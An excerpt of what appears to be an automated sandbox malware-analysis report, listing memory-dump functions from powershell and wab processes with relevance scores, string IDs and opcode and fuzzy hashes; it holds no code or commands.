                                                • Opcode Fuzzy Hash: f73c4c139249efb012e9085f8254c858c5c6817cbdbb57b2c68ad9b9e799f015
                                                • Instruction Fuzzy Hash: DC82AEB0B00205DFCB10CB98C541A6AFBF2AF89305F54C569E90A9F795DB71EC45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7CB81 Relevance: 5.4, Strings: 4, Instructions: 397COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$x.rk$x.rk
                                                • API String ID: 0-916335444
                                                • Opcode ID: 605b6c1c63d0d9b49e6e6e00efb2d53802f56d5cab4edbbb715ba484b8995771
                                                • Instruction ID: 7ef2391039ce81107c34fb5f60c5e8cef94e18320a40a1856e8a8d933f073688
                                                • Opcode Fuzzy Hash: 605b6c1c63d0d9b49e6e6e00efb2d53802f56d5cab4edbbb715ba484b8995771
                                                • Instruction Fuzzy Hash: B1024EB4A002199FDB24DB14C950BEEBBB2EF84304F50C5E9D9096B785CB75AE81CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D74728 Relevance: 4.2, Strings: 3, Instructions: 444COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPdq$tPdq$x.rk
                                                • API String ID: 0-1361188210
                                                • Opcode ID: dbd66dd1435b758f3ca941fd8dbbf9f3419541a639faee2daa908c6db21e5d74
                                                • Instruction ID: ac8ab5f509954102aeba6d585c00fae8f38b240f7256d4639372ea9dd5f28c09
                                                • Opcode Fuzzy Hash: dbd66dd1435b758f3ca941fd8dbbf9f3419541a639faee2daa908c6db21e5d74
                                                • Instruction Fuzzy Hash: ABF113B0B002559FCB15DB68C951BAAFBE2AFC9304F54C469E905AF790DB31EC41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D708C2 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq
                                                • API String ID: 0-847773763
                                                • Opcode ID: 1e6ed60dd176fd737a3ce176ccebf268870bf61e81a403306fcb47faf1890418
                                                • Instruction ID: f20e4d2b7a489320e2a2c9dba27ed3da48df246e7b10dc483b62daffdde63f32
                                                • Opcode Fuzzy Hash: 1e6ed60dd176fd737a3ce176ccebf268870bf61e81a403306fcb47faf1890418
                                                • Instruction Fuzzy Hash: CF8136B13083569FCB114B29891066BFFF5EFC6215F19846BD888CB2D2EB35C941C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7301B Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPdq
                                                • API String ID: 0-2402691438
                                                • Opcode ID: 98cca1a7774e07d119aaa88a4fe834951fbeca28f78e2f21242d08adb32af837
                                                • Instruction ID: 4a9db120ae70c91e8ade0a0493b776e4bfc7524c9db3059b622ff68f1f2f8634
                                                • Opcode Fuzzy Hash: 98cca1a7774e07d119aaa88a4fe834951fbeca28f78e2f21242d08adb32af837
                                                • Instruction Fuzzy Hash: 6A41F5B06093C5AFC7228B648C15B66FFB1AF46310F19C09BE984AF292D635DD45C7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D77706 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x.rk
                                                • API String ID: 0-2054528801
                                                • Opcode ID: 95b710d75527031af11d07f606d08ca3ca0dd3663191eecf7edeef3db6292195
                                                • Instruction ID: c0f06277dc63a94ea24e0f58eb3a4b9f6ceb20e5c050c216566088c1be2eb039
                                                • Opcode Fuzzy Hash: 95b710d75527031af11d07f606d08ca3ca0dd3663191eecf7edeef3db6292195
                                                • Instruction Fuzzy Hash: 7C31E7B0B10204AFD7149764C911BAEBAA3ABC5714F54C838E9057FB81CF75AC41DB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7E0BF Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq
                                                • API String ID: 0-1167855494
                                                • Opcode ID: 397dee5cb161862e9a394e3fac2460b0bb138f23954408b028b5ac93f84a0ecd
                                                • Instruction ID: 9958262af6e8d9dfa2e67396e7f7f79a52be0939a82a676e4984683d4670ca14
                                                • Opcode Fuzzy Hash: 397dee5cb161862e9a394e3fac2460b0bb138f23954408b028b5ac93f84a0ecd
                                                • Instruction Fuzzy Hash: C33137F1A053029BDB214A64840237EFBA29F82614F6901EAD910DF3D1FB35D945C7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D750A8 Relevance: .5, Instructions: 541COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51c6d9af233641bd7a27db4c6c58b086493d6a05f290200ab24371292b8cf416
                                                • Instruction ID: 44c14e2672cc1815a484e6b3ea62ccfe597e6a218a09ea63bb131f6d6921a563
                                                • Opcode Fuzzy Hash: 51c6d9af233641bd7a27db4c6c58b086493d6a05f290200ab24371292b8cf416
                                                • Instruction Fuzzy Hash: E6327BB4A00205DFDB10CB88D541E5AFBB2EF89304F64C1A9E90A9F755DB72EC45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08A25880 Relevance: .5, Instructions: 520COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2287027465.0000000008A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_8a20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae853545872feac4241ffb200667c1a30e3908102a2767b97947d4b6e4bf2af6
                                                • Instruction ID: 7151117e66613cbe92160dfaa22fbd2e70f26d2a713dc120afe96aa39028a41a
                                                • Opcode Fuzzy Hash: ae853545872feac4241ffb200667c1a30e3908102a2767b97947d4b6e4bf2af6
                                                • Instruction Fuzzy Hash: C0222974A01219DFCB15CF9CC484AAEBBB2FF88311F248559E805AB761C735ED82CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7581D Relevance: .5, Instructions: 483COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2c525c17d60f0e24f6b5922aafcbd8f3e76d42fba8cc8d4134b5bddeb86843a
                                                • Instruction ID: 5acfca0e53b444c9c58a08c8cb7247c7ed4c1b4ceca0d7be5aa12cd95cb19e94
                                                • Opcode Fuzzy Hash: e2c525c17d60f0e24f6b5922aafcbd8f3e76d42fba8cc8d4134b5bddeb86843a
                                                • Instruction Fuzzy Hash: 4F129CB4A00205DFDB20CB88D541E6AFBB2EF85304F64C1A9E9069F755DB72EC45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7E42C Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e0b5cd03a834ae9f39b21a21df28643bef7ee6756403bf1afd93fc654a5947f
                                                • Instruction ID: d604d39c784c33afbfa1573ed1cc371b92baebca1e3043d8f12c07dc8751b2f6
                                                • Opcode Fuzzy Hash: 0e0b5cd03a834ae9f39b21a21df28643bef7ee6756403bf1afd93fc654a5947f
                                                • Instruction Fuzzy Hash: 7A8128B4A00205DFCB14CF58C581A99FBF2EF89314F59C5AAE805AB765D732EC41CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08A26240 Relevance: .2, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2287027465.0000000008A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_8a20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbe5ffd8161d8611d3041b7c043d538f9445de9cf161575101a1659189c044df
                                                • Instruction ID: cb3e9746b941050f0ef22ff1a4e77cb68e88599739a4c8a7c7f6f0f9cc76e713
                                                • Opcode Fuzzy Hash: dbe5ffd8161d8611d3041b7c043d538f9445de9cf161575101a1659189c044df
                                                • Instruction Fuzzy Hash: 75912574A01228DFCB15CF98D584AAEFBB2FF48310F248569E845AB761C731ED91CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08A261F0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2287027465.0000000008A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_8a20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee63596cdc4dfb84ea12eee78cb83d6a2732748916fddcd48976b88272e79369
                                                • Instruction ID: 2443d9bd8a31c7c026a33818201fc735c5535205c595cedf857440fd557b0b7d
                                                • Opcode Fuzzy Hash: ee63596cdc4dfb84ea12eee78cb83d6a2732748916fddcd48976b88272e79369
                                                • Instruction Fuzzy Hash: F1418175A01214CFC716CF8CD890AEEBBB2FF49310B24465AD551AB7A1C735EC55CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08A2623F Relevance: .1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2287027465.0000000008A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_8a20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f964ace63da6769e636c4c953fc38e5e0e7b3d9cd954fd13e9c24d4d5e8afe8
                                                • Instruction ID: dd63fc894fa363326c7b5697be75eb765acb983b7329325814fcaef183a5063b
                                                • Opcode Fuzzy Hash: 2f964ace63da6769e636c4c953fc38e5e0e7b3d9cd954fd13e9c24d4d5e8afe8
                                                • Instruction Fuzzy Hash: 6F411674A01119DFCB15CF99C484AEEFBB2FF88310B248669D905A77A0D731EC91CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 07D7DB20 Relevance: 14.2, Strings: 11, Instructions: 448COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tqk$4'dq$4'dq$4'dq$4'dq$4'dq$4'dq$DUqk$$dq$$dq$$dq
                                                • API String ID: 0-178945670
                                                • Opcode ID: 1b93cb6fc27e17507737ab7ae2ecaa19c65cab7d9ef6f191894461b4c4a37393
                                                • Instruction ID: 9d498d5073fa05e454e5edc7f027572a894b8a120c0c7f8950538a0f7b4a87c4
                                                • Opcode Fuzzy Hash: 1b93cb6fc27e17507737ab7ae2ecaa19c65cab7d9ef6f191894461b4c4a37393
                                                • Instruction Fuzzy Hash: 3AE107B1B042169FCB259F68D4416AAFBF3AFCA311F24C0AAD845CF251EB31D945C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D71EF0 Relevance: 12.9, Strings: 10, Instructions: 400COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-4287419856
                                                • Opcode ID: bc069429d74e8fb55d4387ae7d5351ffcebb278b14e11e7b2cb4a484f14e50d0
                                                • Instruction ID: c340c6709ca2f1aa27838f1d642a139ac55009834e3ed25749e7e1542218e429
                                                • Opcode Fuzzy Hash: bc069429d74e8fb55d4387ae7d5351ffcebb278b14e11e7b2cb4a484f14e50d0
                                                • Instruction Fuzzy Hash: B0C124B170024A9FCB258A69C81127AFBF2BFC5311F24847AD945DB291FF32E941C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D71920 Relevance: 12.8, Strings: 10, Instructions: 305COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$4'dq$tPdq$tPdq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-608414060
                                                • Opcode ID: 34c4e24e2c8a4b8c54c95e90c5ee0583b1e712f1ad4e8352a86d67383d814709
                                                • Instruction ID: 8a8610f6b37c440a22918252d0fc7650a939fcdcc2c6b07650898f58d64b75a3
                                                • Opcode Fuzzy Hash: 34c4e24e2c8a4b8c54c95e90c5ee0583b1e712f1ad4e8352a86d67383d814709
                                                • Instruction Fuzzy Hash: 1CA117B1B002199BCB249AA9C5016ABFBE2FFC5311F14C66AD8559B380EF32D946C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D79725 Relevance: 8.9, Strings: 7, Instructions: 159COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$TQiq$TQiq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-2592043700
                                                • Opcode ID: 7d09fabd06eb0b9f28f5904a090ea302ebd838a53850994dfbf07a42540f68fe
                                                • Instruction ID: 0e71ea9ba099cd4554033b09caae37cddecfc0afd154a5f9baea2351517c1686
                                                • Opcode Fuzzy Hash: 7d09fabd06eb0b9f28f5904a090ea302ebd838a53850994dfbf07a42540f68fe
                                                • Instruction Fuzzy Hash: 6E5102F2600206DFDB24CE05C5647AAF7A6FF41311F18906AE8459F291E731FD80CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7C5B2 Relevance: 6.5, Strings: 5, Instructions: 222COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$4'dq$x.rk$-rk
                                                • API String ID: 0-629053205
                                                • Opcode ID: 3a797a80f212c18b2fdeefcff8ec156b463e458e82387aa960856b542a3c74f0
                                                • Instruction ID: 6d2df94a4fc3f76429f6efaa908e8f26cf3a78955fdb6dc7a73ae03517f32ec4
                                                • Opcode Fuzzy Hash: 3a797a80f212c18b2fdeefcff8ec156b463e458e82387aa960856b542a3c74f0
                                                • Instruction Fuzzy Hash: 69A17CB0A102198FDB24DB14C950BEAB7B2FB84305F1085E5D9096F785DB35AEC1CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D718FF Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$tPdq$$dq$$dq$$dq
                                                • API String ID: 0-3100050110
                                                • Opcode ID: ffb7a8606d142b5cf919f11ca7835bacfa0fef38384435618a317e56d79ab067
                                                • Instruction ID: ea30c361775b90759bfd283925f969fc1ec3921e07445c6da73bb6bdfd994733
                                                • Opcode Fuzzy Hash: ffb7a8606d142b5cf919f11ca7835bacfa0fef38384435618a317e56d79ab067
                                                • Instruction Fuzzy Hash: D0412AF0A05249DFDB258E54C6407A6FBB2EFC6310F18C3AAD8545B291E733C946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D79585 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                • API String ID: 0-2509493698
                                                • Opcode ID: cb109aa5b1a19a36aed2514f2fddf7c7472dd1f3adaf6a588d746ec70702aa5d
                                                • Instruction ID: fc86c76fe886d77d77ffd893070c572bff099db4b029659603be1187f7bafdb1
                                                • Opcode Fuzzy Hash: cb109aa5b1a19a36aed2514f2fddf7c7472dd1f3adaf6a588d746ec70702aa5d
                                                • Instruction Fuzzy Hash: C83159F3704226CFCB248A69947067BF7E2AFC6211B24817BC84686281FE36E552C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7E2C0 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPdq$$dq$$dq$$dq$$dq
                                                • API String ID: 0-3077656471
                                                • Opcode ID: d848ec7c734ac10b207ea7ef7888280c8ceff0f5ba45c4a980fec9a609b3c08a
                                                • Instruction ID: daa66fe4009bab783466facf70b4409c689ba508e8921aa6213b7c30097674ad
                                                • Opcode Fuzzy Hash: d848ec7c734ac10b207ea7ef7888280c8ceff0f5ba45c4a980fec9a609b3c08a
                                                • Instruction Fuzzy Hash: CD21F8F6600316CFDB208E55D54097AF7B5EF41A12F1441AEEC449B3A1E731DA00C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D700F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq$wl$wl
                                                • API String ID: 0-924300544
                                                • Opcode ID: 2bc71aa4b42cc4f3de1e7419fa0ea2ce5f821fe76c662165c2c67246649205a8
                                                • Instruction ID: 82171750f7f75d619782dc35c8ddabd5db77c674f05565e226d7eab0d818d446
                                                • Opcode Fuzzy Hash: 2bc71aa4b42cc4f3de1e7419fa0ea2ce5f821fe76c662165c2c67246649205a8
                                                • Instruction Fuzzy Hash: 9211E9B130031A9BEB34592AD805767F7A7ABC1761F24C02AEC89CA2D1FA31C581C370
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D78BB8 Relevance: 5.5, Strings: 4, Instructions: 478COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (odq$(odq$(odq$(odq
                                                • API String ID: 0-2844368422
                                                • Opcode ID: c1764c6848398c6c81534c28d11c7c860b8f6e5802bafacc781d8fb24ab14467
                                                • Instruction ID: a00a6987cc9db71e397753e3c288f498bd0539647b8502628be3ee9487acaeb2
                                                • Opcode Fuzzy Hash: c1764c6848398c6c81534c28d11c7c860b8f6e5802bafacc781d8fb24ab14467
                                                • Instruction Fuzzy Hash: 3BF148B170431ADFCB258F28C8587AAFBE2FFC5311F14846AE9458B291EB35D941C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7E9C8 Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPdq$tPdq$tPdq$tPdq
                                                • API String ID: 0-3640695437
                                                • Opcode ID: b5a395ec8ec1cef0c8761059f11c0617cf5b61dde24f2f936c40636b62755644
                                                • Instruction ID: 05ca0000a04cc34457372fa1c3796d01902de36c54fda7a1e57c4a993048519a
                                                • Opcode Fuzzy Hash: b5a395ec8ec1cef0c8761059f11c0617cf5b61dde24f2f936c40636b62755644
                                                • Instruction Fuzzy Hash: E5A1D3B4B002159FCB248F58C941A6AFFE2FF89310F1988AAE9459B391EB31DD41C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D7A500 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XRiq$XRiq$tPdq$$dq
                                                • API String ID: 0-3891573685
                                                • Opcode ID: 9419d6792112900cd45d411f3a08ddac47450759c190bd791355cbf6139c85bd
                                                • Instruction ID: 8ec1e701ff499f8015ed08569878d29afc4e4b77c75861a8026f2af93d9c95b5
                                                • Opcode Fuzzy Hash: 9419d6792112900cd45d411f3a08ddac47450759c190bd791355cbf6139c85bd
                                                • Instruction Fuzzy Hash: A0416FB5A00206DBCB24CF5DC144AAEF7F2AFC4711F69C0AAE8556B295E731DD40CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D723A0 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq$$dq
                                                • API String ID: 0-185584874
                                                • Opcode ID: 1e9017f331501a0bc22def3880e38122a114996eef044740975f71e90d6d4890
                                                • Instruction ID: ab24d794b091fcffa7e5395c0308e43b9d0bb78ebbfe5797f6f95799a064f9e0
                                                • Opcode Fuzzy Hash: 1e9017f331501a0bc22def3880e38122a114996eef044740975f71e90d6d4890
                                                • Instruction Fuzzy Hash: A23147F13102566BDB2449399942737F6A6ABC0719F60883AAA42CF3C1ED66FD41C3A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D70CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $dq$$dq$$dq$$dq
                                                • API String ID: 0-185584874
                                                • Opcode ID: 5a0a8442d0746bf8676f3b6b9c5bccbb4bd339a708e35af90c324445187dca61
                                                • Instruction ID: c14531702fdeaa8c734fccb9db31a576e33d7726487b2fd643ed44faed408919
                                                • Opcode Fuzzy Hash: 5a0a8442d0746bf8676f3b6b9c5bccbb4bd339a708e35af90c324445187dca61
                                                • Instruction Fuzzy Hash: F92147F131030A6BDB34596A9880733FAE69BC4311F28843AA949CB7C1EE71E841C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07D717A0 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2284244143.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_7d70000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'dq$4'dq$$dq$$dq
                                                • API String ID: 0-4229963660
                                                • Opcode ID: 02e0df126727109330a19b95889bd41b02c9de2d1bed826e954f92ec0313b59c
                                                • Instruction ID: e4351da28a50eeaa8e13f21195a0306284653b2020f77187ae4424643a834554
                                                • Opcode Fuzzy Hash: 02e0df126727109330a19b95889bd41b02c9de2d1bed826e954f92ec0313b59c
                                                • Instruction Fuzzy Hash: CD01A2A1A0D3DA5FCB2746682821162AFB36FC311172A429BC4C1DF7A2DD1A8D45C3A3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 0058A9E7 Relevance: 2.9, Instructions: 2903COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2955244927.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_580000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5562869b6f0ff57f10e4eae30deb08258033137a63947bab279da3f51bb60ee
                                                • Instruction ID: 3e6b610f2c769899bbefff03c55656c89a5b94f4bec5684454116c4f9da6883a
                                                • Opcode Fuzzy Hash: d5562869b6f0ff57f10e4eae30deb08258033137a63947bab279da3f51bb60ee
                                                • Instruction Fuzzy Hash: 9463E831D10B1A8ADB11EF68C884699FBB1FF99300F51D79AE45877121EB70AAC5CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

